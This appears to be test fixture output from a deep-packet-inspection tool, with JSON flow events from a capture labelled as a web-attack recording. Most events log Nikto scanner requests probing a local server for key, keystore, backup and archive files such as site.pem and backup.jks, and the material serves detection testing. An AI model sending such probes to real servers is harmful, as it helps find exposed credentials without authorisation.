-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277004,"pkt":"AAAAAAAAAAAAAAAACABFAADBfrVAAEAGvX9\/AAABfwAAAcM2H5AiEUbRArZM2IAYAED+tQAAAQEICp1m\/DSdZvw0R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277006,"pkt":"AAAAAAAAAAAAAAAACABFAADBggJAAEAGujJ\/AAABfwAAAcM4H5AaCbpkhn3rTYAYAED+tQAAAQEICp1m\/DadZvw1R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277007,"pkt":"AAAAAAAAAAAAAAAACABFAADC7TtAAEAGTvh\/AAABfwAAAcM6H5D6jdVeqyQPZoAYAED+tgAAAQEICp1m\/DedZvw3R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277010,"pkt":"AAAAAAAAAAAAAAAACABFAADChG5AAEAGt8V\/AAABfwAAAcM8H5BcKrwJSZEDE4AYAED+tgAAAQEICp1m\/DqdZvw6R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277011,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/sClAAEAGjA1\/AAABfwAAAcM+H5BuqIhDc4THFIAYAED+swAAAQEICp1m\/DudZvw7R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277013,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/xzVAAEAGdQF\/AAABfwAAAcNAH5BZGv9XO\/ACDYAYAED+swAAAQEICp1m\/D2dZvw9R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277014,"pkt":"AAAAAAAAAAAAAAAACABFAADAIeRAAEAGGlJ\/AAABfwAAAcNCH5DPShmIhuR59oAYAED+tAAAAQEICp1m\/D6dZvw+R0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277016,"pkt":"AAAAAAAAAAAAAAAACABFAADA415AAEAGWNd\/AAABfwAAAcNEH5AFlNs7Kigy04AYAED+tAAAAQEICp1m\/ECdZvxAR0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277017,"pkt":"AAAAAAAAAAAAAAAACABFAADConZAAEAGmb1\/AAABfwAAAcNGH5DVgZoTcsiCOoAYAED+tgAAAQEICp1m\/EGdZvxBR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277019,"pkt":"AAAAAAAAAAAAAAAACABFAADCTHZAAEAG771\/AAABfwAAAcNIH5DfPnQTJOA0c4AYAED+tgAAAQEICp1m\/EKdZvxCR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277020,"pkt":"AAAAAAAAAAAAAAAACABFAADCeAVAAEAGxC5\/AAABfwAAAcNKH5DAxUBlVYOEbYAYAED+tgAAAQEICp1m\/ESdZvxER0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 